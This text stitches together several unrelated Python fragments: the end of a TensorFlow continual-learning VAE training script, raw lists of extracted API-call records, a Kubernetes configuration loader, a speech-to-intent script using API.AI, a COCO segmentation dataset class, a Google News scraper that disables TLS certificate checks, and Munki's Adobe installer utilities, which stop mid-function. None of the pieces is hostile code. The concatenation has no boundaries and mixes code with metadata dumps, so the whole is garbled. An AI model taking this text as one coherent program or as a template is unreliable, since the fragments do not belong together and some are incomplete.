if method == 'laplace':
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'si':
bound = lowerbound(X_ph, enc, dec, ll)
fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
si_reg, old_params_shared, lbd)
if old_params_shared is None:
old_params_shared = sess.run(shared_var_list)
# initialise all the uninitialised stuff
old_var_list = init_variables(sess, old_var_list)
# start training for each task
if method == 'si':
new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
else:
fit(sess, X_train, n_iter, lr)
# plot samples
x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
for i in range(len(x_gen_list)):
plot_images(x_gen_list[i], shape_high, path, \
data_name+'_gen_task%d_%d' % (task, i+1))
x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
x_list = np.concatenate(x_list, 0)
tmp = np.zeros([10, dimX])
tmp[:task] = x_list
if task == 1:
x_gen_all = tmp
else:
x_gen_all = np.concatenate([x_gen_all, tmp], 0)
# print test-ll on all tasks
tmp_list = []
for i in range(len(eval_func_list)):
print('task %d' % (i+1), end=' ')
test_ll = eval_func_list[i](sess, X_valid_list[i])
tmp_list.append(test_ll)
result_list.append(tmp_list)
# save param values
save_params(sess, filename, checkpoint)
checkpoint += 1
# update regularisers/priors
if method == 'ewc':
# update EWC loss
print('update ewc loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
if method == 'laplace':
# update EWC loss
print('update laplace loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
if method == 'onlinevi':
# update prior
print('update prior...')
shared_prior_params = update_shared_prior(sess, shared_prior_params)
# reset the variance of q
update_q_sigma(sess)
if method == 'si':
# update regularisers/priors
print('update SI big omega matrices...')
si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
old_params_shared, w_params_shared)
old_params_shared = new_params_shared
plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')
for i in range(len(result_list)):
print(result_list[i])
# save results
if not os.path.isdir("results/"):
os.mkdir("results/")
fname = 'results/' + data_name + '_%s.pkl' % string
import pickle
with open(fname, 'wb') as f:
pickle.dump(result_list, f)
print('test-ll results saved in', fname)
if __name__ == '__main__':
data_name = str(sys.argv[1])
method = str(sys.argv[2])
assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
if method == 'onlinevi':
lbd = 1.0 # some placeholder, doesn't matter
else:
lbd = float(sys.argv[3])
main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
| [
"eval_test_ll.construct_eval_func",
"generator.construct_gen",
"notmnist.load_notmnist",
"vae_laplace.init_fisher_accum",
"visualisation.plot_images",
"vae_si.update_si_reg",
"tensorflow.placeholder",
"tensorflow.Session",
"utils.load_params",
"os.path.isdir",
"sys.path.extend",
"os.mkdir",
... | [((58, 94), 'sys.path.extend', 'sys.path.extend', (["['alg/', 'models/']"], {}), "(['alg/', 'models/'])\n", (73, 94), False, 'import sys, os\n'), ((580, 608), 'config.config', 'config', (['data_name', 'n_channel'], {}), '(data_name, n_channel)\n', (586, 608), False, 'from config import config\n'), ((1757, 1810), 'tensorflow.placeholder', 'tf.placeholder', (['tf.int32'], {'shape': '()', 'name': '"""batch_size"""'}), "(tf.int32, shape=(), name='batch_size')\n", (1771, 1810), True, 'import tensorflow as tf\n'), ((1828, 1891), 'generator.generator_shared', 'generator_shared', (['dimX', 'dimH', 'n_layers_shared', '"""sigmoid"""', '"""gen"""'], {}), "(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')\n", (1844, 1891), False, 'from generator import generator_head, generator_shared, generator, construct_gen\n'), ((1932, 1948), 'tensorflow.ConfigProto', 'tf.ConfigProto', ([], {}), '()\n', (1946, 1948), True, 'import tensorflow as tf\n'), ((2003, 2028), 'tensorflow.Session', 'tf.Session', ([], {'config': 'config'}), '(config=config)\n', (2013, 2028), True, 'import tensorflow as tf\n'), ((2925, 2990), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32'], {'shape': '(batch_size, dimX)', 'name': '"""x_ph"""'}), "(tf.float32, shape=(batch_size, dimX), name='x_ph')\n", (2939, 2990), True, 'import tensorflow as tf\n'), ((8364, 8428), 'visualisation.plot_images', 'plot_images', (['x_gen_all', 'shape_high', 'path', "(data_name + '_gen_all')"], {}), "(x_gen_all, shape_high, path, data_name + '_gen_all')\n", (8375, 8428), False, 'from visualisation import plot_images\n'), ((2272, 2294), 'os.path.isdir', 'os.path.isdir', (['"""save/"""'], {}), "('save/')\n", (2285, 2294), False, 'import sys, os\n'), ((2304, 2321), 'os.mkdir', 'os.mkdir', (['"""save/"""'], {}), "('save/')\n", (2312, 2321), False, 'import sys, os\n'), ((2333, 2367), 'os.path.isdir', 'os.path.isdir', (["('save/' + path_name)"], {}), "('save/' + path_name)\n", (2346, 2367), False, 'import sys, os\n'), ((2375, 
2404), 'os.mkdir', 'os.mkdir', (["('save/' + path_name)"], {}), "('save/' + path_name)\n", (2383, 2404), False, 'import sys, os\n'), ((2585, 2605), 'utils.init_variables', 'init_variables', (['sess'], {}), '(sess)\n', (2599, 2605), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((2624, 2663), 'utils.load_params', 'load_params', (['sess', 'filename', 'checkpoint'], {}), '(sess, filename, checkpoint)\n', (2635, 2663), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((2772, 2794), 'os.path.isdir', 'os.path.isdir', (['"""figs/"""'], {}), "('figs/')\n", (2785, 2794), False, 'import sys, os\n'), ((2804, 2821), 'os.mkdir', 'os.mkdir', (['"""figs/"""'], {}), "('figs/')\n", (2812, 2821), False, 'import sys, os\n'), ((2833, 2852), 'os.path.isdir', 'os.path.isdir', (['path'], {}), '(path)\n', (2846, 2852), False, 'import sys, os\n'), ((2862, 2876), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (2870, 2876), False, 'import sys, os\n'), ((3207, 3226), 'onlinevi.init_shared_prior', 'init_shared_prior', ([], {}), '()\n', (3224, 3226), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((3331, 3350), 'vae_laplace.init_fisher_accum', 'init_fisher_accum', ([], {}), '()\n', (3348, 3350), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((4175, 4231), 'encoder_no_shared.encoder', 'encoder', (['dimX', 'dimH', 'dimZ', 'n_layers_enc', "('enc_%d' % task)"], {}), "(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)\n", (4182, 4231), False, 'from encoder_no_shared import encoder, recon\n'), ((5870, 5904), 'utils.init_variables', 'init_variables', (['sess', 'old_var_list'], {}), '(sess, old_var_list)\n', (5884, 5904), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((6499, 6524), 'numpy.concatenate', 'np.concatenate', (['x_list', '(0)'], {}), '(x_list, 0)\n', (6513, 6524), True, 
'import numpy as np\n'), ((6539, 6559), 'numpy.zeros', 'np.zeros', (['[10, dimX]'], {}), '([10, dimX])\n', (6547, 6559), True, 'import numpy as np\n'), ((7080, 7119), 'utils.save_params', 'save_params', (['sess', 'filename', 'checkpoint'], {}), '(sess, filename, checkpoint)\n', (7091, 7119), False, 'from utils import init_variables, save_params, load_params, load_data\n'), ((8539, 8564), 'os.path.isdir', 'os.path.isdir', (['"""results/"""'], {}), "('results/')\n", (8552, 8564), False, 'import sys, os\n'), ((8574, 8594), 'os.mkdir', 'os.mkdir', (['"""results/"""'], {}), "('results/')\n", (8582, 8594), False, 'import sys, os\n'), ((8711, 8738), 'pickle.dump', 'pickle.dump', (['result_list', 'f'], {}), '(result_list, f)\n', (8722, 8738), False, 'import pickle\n'), ((3665, 3712), 'mnist.load_mnist', 'load_mnist', ([], {'digits': 'labels[task - 1]', 'conv': '(False)'}), '(digits=labels[task - 1], conv=False)\n', (3675, 3712), False, 'from mnist import load_mnist\n'), ((3787, 3837), 'notmnist.load_notmnist', 'load_notmnist', ([], {'digits': 'labels[task - 1]', 'conv': '(False)'}), '(digits=labels[task - 1], conv=False)\n', (3800, 3837), False, 'from notmnist import load_notmnist\n'), ((4089, 4147), 'generator.generator_head', 'generator_head', (['dimZ', 'dimH', 'n_layers_head', "('gen_%d' % task)"], {}), "(dimZ, dimH, n_layers_head, 'gen_%d' % task)\n", (4103, 4147), False, 'from generator import generator_head, generator_shared, generator, construct_gen\n'), ((4378, 4455), 'eval_test_ll.construct_eval_func', 'construct_eval_func', (['X_ph', 'enc', 'dec', 'll', 'batch_size_ph'], {'K': '(100)', 'sample_W': '(False)'}), '(X_ph, enc, dec, ll, batch_size_ph, K=100, sample_W=False)\n', (4397, 4455), False, 'from eval_test_ll import construct_eval_func\n'), ((4664, 4773), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'enc', 'dec', 'll', 'X_train.shape[0]', 'batch_size_ph', 'shared_prior_params', 'task', 'K_mc'], {}), '(X_ph, enc, dec, ll, X_train.shape[0], 
batch_size_ph,\n shared_prior_params, task, K_mc)\n', (4683, 4773), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4881, 4911), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (4891, 4911), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4930, 5005), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'ewc_loss'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)\n', (4949, 5005), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5188, 5218), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (5198, 5218), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5237, 5316), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'laplace_loss'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)\n', (5256, 5316), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5348, 5408), 'vae_laplace.compute_fisher', 'compute_fisher', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0])\n', (5362, 5408), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((5457, 5487), 'vae_si.lowerbound', 'lowerbound', (['X_ph', 'enc', 'dec', 'll'], {}), '(X_ph, enc, dec, ll)\n', (5467, 5487), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((5523, 5624), 'vae_si.construct_optimizer', 'construct_optimizer', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]', 'si_reg', 'old_params_shared', 'lbd'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0], si_reg,\n old_params_shared, lbd)\n', (5542, 5624), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), 
((6275, 6369), 'visualisation.plot_images', 'plot_images', (['x_gen_list[i]', 'shape_high', 'path', "(data_name + '_gen_task%d_%d' % (task, i + 1))"], {}), "(x_gen_list[i], shape_high, path, data_name + '_gen_task%d_%d' %\n (task, i + 1))\n", (6286, 6369), False, 'from visualisation import plot_images\n'), ((6687, 6722), 'numpy.concatenate', 'np.concatenate', (['[x_gen_all, tmp]', '(0)'], {}), '([x_gen_all, tmp], 0)\n', (6701, 6722), True, 'import numpy as np\n'), ((7409, 7472), 'vae_ewc.update_ewc_loss', 'update_ewc_loss', (['sess', 'ewc_loss', 'var_list', 'fisher', 'lbd', 'X_batch'], {}), '(sess, ewc_loss, var_list, fisher, lbd, X_batch)\n', (7424, 7472), False, 'from vae_ewc import update_ewc_loss, compute_fisher\n'), ((7712, 7778), 'vae_laplace.update_laplace_loss', 'update_laplace_loss', (['sess', 'F_accum', 'var_list', 'fisher', 'lbd', 'X_batch'], {}), '(sess, F_accum, var_list, fisher, lbd, X_batch)\n', (7731, 7778), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n'), ((7910, 7956), 'onlinevi.update_shared_prior', 'update_shared_prior', (['sess', 'shared_prior_params'], {}), '(sess, shared_prior_params)\n', (7929, 7956), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((8007, 8027), 'onlinevi.update_q_sigma', 'update_q_sigma', (['sess'], {}), '(sess)\n', (8021, 8027), False, 'from onlinevi import construct_optimizer, init_shared_prior, update_shared_prior, update_q_sigma\n'), ((8182, 8268), 'vae_si.update_si_reg', 'update_si_reg', (['sess', 'si_reg', 'new_params_shared', 'old_params_shared', 'w_params_shared'], {}), '(sess, si_reg, new_params_shared, old_params_shared,\n w_params_shared)\n', (8195, 8268), False, 'from vae_si import construct_optimizer, lowerbound, update_si_reg\n'), ((4255, 4295), 'generator.construct_gen', 'construct_gen', (['dec', 'dimZ'], {'sampling': '(False)'}), '(dec, dimZ, sampling=False)\n', (4268, 4295), False, 'from generator 
import generator_head, generator_shared, generator, construct_gen\n'), ((5074, 5134), 'vae_laplace.compute_fisher', 'compute_fisher', (['X_ph', 'batch_size_ph', 'bound', 'X_train.shape[0]'], {}), '(X_ph, batch_size_ph, bound, X_train.shape[0])\n', (5088, 5134), False, 'from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum\n')] |
import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
    """Local configuration container that also merges in Kubernetes config maps."""

    @staticmethod
    def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
                           k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
        """Load the local configuration, adding a config file generated from
        the Kubernetes config-map directory when one can be produced.

        Bug fix: the original did ``configs = additional_config_files`` and then
        ``configs += [k8_config_file]``, which (for a list) mutates the shared
        default ``local_config.ADDITIONAL_CONFIGS`` in place on every call.
        Copy into a fresh list before appending.
        """
        configs = list(additional_config_files)
        try:
            copy_k8_config(k8_configs, k8_config_file)
            configs.append(k8_config_file)
        except OSError:
            # best effort: without a config-map dir we fall back to the plain
            # local configuration
            logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)
        local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
    """Collapse the Kubernetes config-map files in k8_config_dir into a single
    INI-style file at k8_config_file.

    Each non-hidden file in the directory becomes one ``[section]`` whose body
    is the file's raw contents.
    """
    section_names = tuple(entry for entry in os.listdir(k8_config_dir)
                          if not entry.startswith("."))
    logger.debug("Found kubernetes config maps %s in %s", section_names, k8_config_dir)
    # read everything first, then write the merged file in one pass
    sections = {name: _read_config(k8_config_dir, name) for name in section_names}
    with open(k8_config_file, 'w') as k8_cfg:
        logger.info("Writing %s", k8_cfg)
        for name, contents in sections.items():
            k8_cfg.write(f"[{name}]\n")
            k8_cfg.write(contents)
            k8_cfg.write("\n")
def _read_config(k8_configs, config_file):
    """Return the raw text of one config-map file inside k8_configs."""
    logger.info("Loading %s/%s", k8_configs, config_file)
    full_path = os.path.join(k8_configs, config_file)
    with open(full_path) as cfg:
        return cfg.read()
"logging.getLogger",
"os.listdir",
"os.path.join",
"cltl.combot.infra.config.local.LocalConfigurationContainer.load_configuration"
] | [((90, 117), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (107, 117), False, 'import logging\n'), ((773, 858), 'cltl.combot.infra.config.local.LocalConfigurationContainer.load_configuration', 'local_config.LocalConfigurationContainer.load_configuration', (['config_file', 'configs'], {}), '(config_file,\n configs)\n', (832, 858), True, 'import cltl.combot.infra.config.local as local_config\n'), ((1591, 1628), 'os.path.join', 'os.path.join', (['k8_configs', 'config_file'], {}), '(k8_configs, config_file)\n', (1603, 1628), False, 'import os\n'), ((948, 973), 'os.listdir', 'os.listdir', (['k8_config_dir'], {}), '(k8_config_dir)\n', (958, 973), False, 'import os\n')] |
import json
import apiai
import speech_recognition as sr
def speechRecognition():
    """Capture speech from the microphone and hand the transcript to
    speechPrediction().

    Bug fix: the original captured ``audio`` once and then looped on
    ``recognize_google(audio)``; on ``UnknownValueError`` or ``RequestError``
    the same unrecognizable clip was retried forever (an infinite loop).
    Now each failed attempt prompts the user and listens again.
    """
    recognizer = sr.Recognizer()
    while True:
        with sr.Microphone() as source:
            print("It's your cue")
            audio = recognizer.listen(source)
        try:
            text = recognizer.recognize_google(audio)
        except sr.UnknownValueError:
            # speech was unintelligible: prompt and record a new clip
            print("Please speak again")
        except sr.RequestError:
            # network/API problem: prompt and try again
            print("Please check your connection")
        else:
            speechPrediction(text)
            return
def speechPrediction(text):
    """Send *text* to the API.AI agent and return the (intent, room) pair
    parsed from its response by JSONresponse()."""
    CLIENT_ACCESS_TOKEN = "<KEY>"
    DEVELOPER_ACCESS_TOKEN = "cae2<PASSWORD>"
    agent = apiai.ApiAI(CLIENT_ACCESS_TOKEN)
    request = agent.text_request()
    request.query = text
    request.lang = "en"
    response = request.getresponse()
    print(response)
    intent, room = JSONresponse(response)
    return intent, room
def JSONresponse(response):
    """Extract the intent action and room parameter from an API.AI response.

    response: file-like object whose read() returns UTF-8 encoded JSON with
    a 'result' dict containing 'action' and 'parameters'/'room'.
    Returns the (intent, room) tuple.
    """
    payload = json.loads(response.read().decode('utf-8'))
    print(payload)
    print('...')
    result = payload['result']
    intent = result['action']
    print(intent)
    room = result['parameters']['room']
    print(room)
    return intent, room
#speechRecognition()
| [
"speech_recognition.Recognizer",
"apiai.ApiAI",
"speech_recognition.Microphone"
] | [((96, 111), 'speech_recognition.Recognizer', 'sr.Recognizer', ([], {}), '()\n', (109, 111), True, 'import speech_recognition as sr\n'), ((650, 682), 'apiai.ApiAI', 'apiai.ApiAI', (['CLIENT_ACCESS_TOKEN'], {}), '(CLIENT_ACCESS_TOKEN)\n', (661, 682), False, 'import apiai\n'), ((121, 136), 'speech_recognition.Microphone', 'sr.Microphone', ([], {}), '()\n', (134, 136), True, 'import speech_recognition as sr\n')] |
# raise NotImplementedError("Did not check!")
"""MSCOCO Semantic Segmentation pretraining for VOC."""
import os
from tqdm import trange
from PIL import Image, ImageOps, ImageFilter
import numpy as np
import pickle
from gluoncv.data.segbase import SegmentationDataset
class COCOSegmentation(SegmentationDataset):
    """MSCOCO semantic-segmentation dataset restricted to the 21 VOC
    categories (background + 20 classes), used for VOC pretraining.

    Image ids whose combined VOC-class mask covers 1000 pixels or fewer are
    filtered out once per split; the surviving ids are cached in an
    ``*_ids.mx`` pickle so the filtering only runs once.
    """
    # COCO category ids in VOC class order; index 0 is background.
    CAT_LIST = [0, 5, 2, 16, 9, 44, 6, 3, 17, 62, 21, 67, 18, 19, 4,
                1, 64, 20, 63, 7, 72]
    NUM_CLASS = 21

    def __init__(self, root=os.path.expanduser('~/.mxnet/datasets/coco'),
                 split='train', mode=None, transform=None):
        """Load COCO annotations for *split* and build (or load the cached)
        list of qualified image ids."""
        super(COCOSegmentation, self).__init__(root, split, mode, transform)
        # deferred import: pycocotools is only required when this dataset is
        # actually instantiated
        from pycocotools.coco import COCO
        from pycocotools import mask
        if split == 'train':
            print('train set')
            ann_file = os.path.join(root, 'annotations/instances_train2017.json')
            ids_file = os.path.join(root, 'annotations/train_ids.mx')
            self.root = os.path.join(root, 'train2017')
        else:
            print('val set')
            ann_file = os.path.join(root, 'annotations/instances_val2017.json')
            ids_file = os.path.join(root, 'annotations/val_ids.mx')
            self.root = os.path.join(root, 'val2017')
        self.coco = COCO(ann_file)
        self.coco_mask = mask
        # reuse the cached id list if a previous run already filtered it
        if os.path.exists(ids_file):
            with open(ids_file, 'rb') as f:
                self.ids = pickle.load(f)
        else:
            ids = list(self.coco.imgs.keys())
            self.ids = self._preprocess(ids, ids_file)
        self.transform = transform
        # self.root = os.path.join(root, 'train2017') if split == 'train' else \
        #    os.path.join(root, 'val2017')

    def __getitem__(self, index):
        """Return the (image, mask) pair at *index*, transformed per self.mode
        ('train', 'val' or 'testval')."""
        coco = self.coco
        img_id = self.ids[index]
        img_metadata = coco.loadImgs(img_id)[0]
        path = img_metadata['file_name']
        img = Image.open(os.path.join(self.root, path)).convert('RGB')
        cocotarget = coco.loadAnns(coco.getAnnIds(imgIds=img_id))
        mask = Image.fromarray(self._gen_seg_mask(cocotarget, img_metadata['height'],
                                            img_metadata['width']))
        # synchrosized transform
        if self.mode == 'train':
            img, mask = self._sync_transform(img, mask)
        elif self.mode == 'val':
            img, mask = self._val_sync_transform(img, mask)
        else:
            assert self.mode == 'testval'
            mask = self._mask_transform(mask)
        # general resize, normalize and toTensor
        if self.transform is not None:
            img = self.transform(img)
        return img, mask

    def __len__(self):
        """Number of qualified images in this split."""
        return len(self.ids)

    def _gen_seg_mask(self, target, h, w):
        """Rasterize COCO annotations into a single (h, w) uint8 mask of VOC
        class indices. Pixels already labelled are never overwritten
        (the ``mask == 0`` factor), so earlier instances win on overlap."""
        mask = np.zeros((h, w), dtype=np.uint8)
        coco_mask = self.coco_mask
        for instance in target:
            rle = coco_mask.frPyObjects(instance['segmentation'], h, w)
            m = coco_mask.decode(rle)
            cat = instance['category_id']
            # skip annotations for categories outside the VOC subset
            if cat in self.CAT_LIST:
                c = self.CAT_LIST.index(cat)
            else:
                continue
            if len(m.shape) < 3:
                mask[:, :] += (mask == 0) * (m * c)
            else:
                # multi-part segmentation decodes to (h, w, parts): collapse
                # the parts into one binary mask before labelling
                mask[:, :] += (mask == 0) * (((np.sum(m, axis=2)) > 0) * c).astype(np.uint8)
        return mask

    def _preprocess(self, ids, ids_file):
        """Filter *ids* down to images whose VOC-class mask covers more than
        1000 pixels, cache the surviving list to *ids_file*, and return it."""
        print("Preprocessing mask, this will take a while." + \
            "But don't worry, it only run once for each split.")
        tbar = trange(len(ids))
        new_ids = []
        for i in tbar:
            img_id = ids[i]
            cocotarget = self.coco.loadAnns(self.coco.getAnnIds(imgIds=img_id))
            img_metadata = self.coco.loadImgs(img_id)[0]
            mask = self._gen_seg_mask(cocotarget, img_metadata['height'],
                                      img_metadata['width'])
            # more than 1k pixels
            if (mask > 0).sum() > 1000:
                new_ids.append(img_id)
            tbar.set_description('Doing: {}/{}, got {} qualified images'. \
                format(i, len(ids), len(new_ids)))
        print('Found number of qualified images: ', len(new_ids))
        with open(ids_file, 'wb') as f:
            pickle.dump(new_ids, f)
        return new_ids

    @property
    def classes(self):
        """Category names."""
        return ('background', 'airplane', 'bicycle', 'bird', 'boat', 'bottle',
                'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse',
                'motorcycle', 'person', 'potted-plant', 'sheep', 'sofa', 'train',
                'tv')
| [
"os.path.exists",
"pickle.dump",
"os.path.join",
"pycocotools.coco.COCO",
"pickle.load",
"numpy.sum",
"numpy.zeros",
"os.path.expanduser"
] | [((471, 515), 'os.path.expanduser', 'os.path.expanduser', (['"""~/.mxnet/datasets/coco"""'], {}), "('~/.mxnet/datasets/coco')\n", (489, 515), False, 'import os\n'), ((1266, 1280), 'pycocotools.coco.COCO', 'COCO', (['ann_file'], {}), '(ann_file)\n', (1270, 1280), False, 'from pycocotools.coco import COCO\n'), ((1322, 1346), 'os.path.exists', 'os.path.exists', (['ids_file'], {}), '(ids_file)\n', (1336, 1346), False, 'import os\n'), ((2767, 2799), 'numpy.zeros', 'np.zeros', (['(h, w)'], {'dtype': 'np.uint8'}), '((h, w), dtype=np.uint8)\n', (2775, 2799), True, 'import numpy as np\n'), ((816, 874), 'os.path.join', 'os.path.join', (['root', '"""annotations/instances_train2017.json"""'], {}), "(root, 'annotations/instances_train2017.json')\n", (828, 874), False, 'import os\n'), ((898, 944), 'os.path.join', 'os.path.join', (['root', '"""annotations/train_ids.mx"""'], {}), "(root, 'annotations/train_ids.mx')\n", (910, 944), False, 'import os\n'), ((969, 1000), 'os.path.join', 'os.path.join', (['root', '"""train2017"""'], {}), "(root, 'train2017')\n", (981, 1000), False, 'import os\n'), ((1067, 1123), 'os.path.join', 'os.path.join', (['root', '"""annotations/instances_val2017.json"""'], {}), "(root, 'annotations/instances_val2017.json')\n", (1079, 1123), False, 'import os\n'), ((1147, 1191), 'os.path.join', 'os.path.join', (['root', '"""annotations/val_ids.mx"""'], {}), "(root, 'annotations/val_ids.mx')\n", (1159, 1191), False, 'import os\n'), ((1216, 1245), 'os.path.join', 'os.path.join', (['root', '"""val2017"""'], {}), "(root, 'val2017')\n", (1228, 1245), False, 'import os\n'), ((4285, 4308), 'pickle.dump', 'pickle.dump', (['new_ids', 'f'], {}), '(new_ids, f)\n', (4296, 4308), False, 'import pickle\n'), ((1419, 1433), 'pickle.load', 'pickle.load', (['f'], {}), '(f)\n', (1430, 1433), False, 'import pickle\n'), ((1915, 1944), 'os.path.join', 'os.path.join', (['self.root', 'path'], {}), '(self.root, path)\n', (1927, 1944), False, 'import os\n'), ((3294, 3311), 
'numpy.sum', 'np.sum', (['m'], {'axis': '(2)'}), '(m, axis=2)\n', (3300, 3311), True, 'import numpy as np\n')] |
# __author__ = 'sree'
import urllib2
from lxml import html
import requests
def get_page_tree(url=None):
    """Fetch *url* and return its parsed lxml HTML tree.

    NOTE(review): verify=False disables TLS certificate checking — confirm
    this is intentional before relying on it.
    """
    response = requests.get(url=url, verify=False)
    return html.fromstring(response.text)
def get_title(url=None):
    """Return the page title of *url*, trimmed at the first ' -' separator."""
    tree = get_page_tree(url=url)
    raw_title = tree.xpath('//title//text()')[0]
    return raw_title.strip().split(' -')[0]
def find_other_news_sources(url=None, title=None):
    """Search Google News for the article's title, excluding the original
    site, and return the target links extracted from Google's redirect URLs.
    """
    # Google forwards hits as <google_domain>/url?q=<actual_link>; this
    # prefix might change over time
    forwarding_identifier = '/url?q='
    if not title:
        title = get_title(url=url)
    exclude_term = '-site:' + url
    search_url = ('http://www.google.com/search?q=' + urllib2.quote(title)
                  + exclude_term + '&tbm=nws')
    search_tree = get_page_tree(url=search_url)
    links = []
    for href in search_tree.xpath('//a//@href'):
        if forwarding_identifier in href:
            links.append(href.replace(forwarding_identifier, '').split('&')[0])
    return links
| [
"lxml.html.fromstring",
"urllib2.quote",
"requests.get"
] | [((117, 152), 'requests.get', 'requests.get', ([], {'url': 'url', 'verify': '(False)'}), '(url=url, verify=False)\n', (129, 152), False, 'import requests\n'), ((164, 190), 'lxml.html.fromstring', 'html.fromstring', (['page.text'], {}), '(page.text)\n', (179, 190), False, 'from lxml import html\n'), ((668, 688), 'urllib2.quote', 'urllib2.quote', (['title'], {}), '(title)\n', (681, 688), False, 'import urllib2\n')] |
# encoding: utf-8
# Copyright 2009-2020 <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
adobeutils.adobeinfo
Created by <NAME> on 2017-01-06.
Utilities to get info about Adobe installers/uninstallers
"""
from __future__ import absolute_import, print_function
import os
import json
import sqlite3
from glob import glob
from xml.dom import minidom
from .. import osutils
from .. import pkgutils
def find_install_app(dirpath):
    '''Search dirpath and every directory below it for an Install.app bundle.
    Returns the path to its executable, or '' when none is found.'''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if not walked_path.endswith("Install.app"):
            continue
        executable = os.path.join(walked_path, "Contents", "MacOS", "Install")
        if os.path.exists(executable):
            return executable
    return ''
def find_setup_app(dirpath):
    '''Search dirpath and every directory below it for a Setup.app bundle.
    Returns the path to its executable, or '' when none is found.'''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if not walked_path.endswith("Setup.app"):
            continue
        executable = os.path.join(walked_path, "Contents", "MacOS", "Setup")
        if os.path.exists(executable):
            return executable
    return ''
def find_adobepatchinstaller_app(dirpath):
    '''Search dirpath and every directory below it for an
    AdobePatchInstaller.app bundle. Returns the path to its executable,
    or '' when none is found.'''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if not walked_path.endswith("AdobePatchInstaller.app"):
            continue
        executable = os.path.join(
            walked_path, "Contents", "MacOS", "AdobePatchInstaller")
        if os.path.exists(executable):
            return executable
    return ''
def find_adobe_deployment_manager(dirpath):
    '''Search dirpath and every directory below it for the
    AdobeDeploymentManager executable (inside a pkg/Contents/Resources
    directory). Returns its path, or '' when none is found.'''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if not walked_path.endswith("pkg/Contents/Resources"):
            continue
        candidate = os.path.join(walked_path, "AdobeDeploymentManager")
        if os.path.exists(candidate):
            return candidate
    return ''
def find_acrobat_patch_app(dirpath):
    '''Attempts to find an AcrobatPro patching application in dirpath.
    If found, returns the path to the .app bundle containing Adobe's
    ApplyOperation.py patching script; otherwise ''.'''
    for (walked_path, _dirs, _files) in os.walk(dirpath):
        if not walked_path.endswith(".app"):
            continue
        # the presence of Adobe's patching script marks the right bundle
        patch_script = os.path.join(
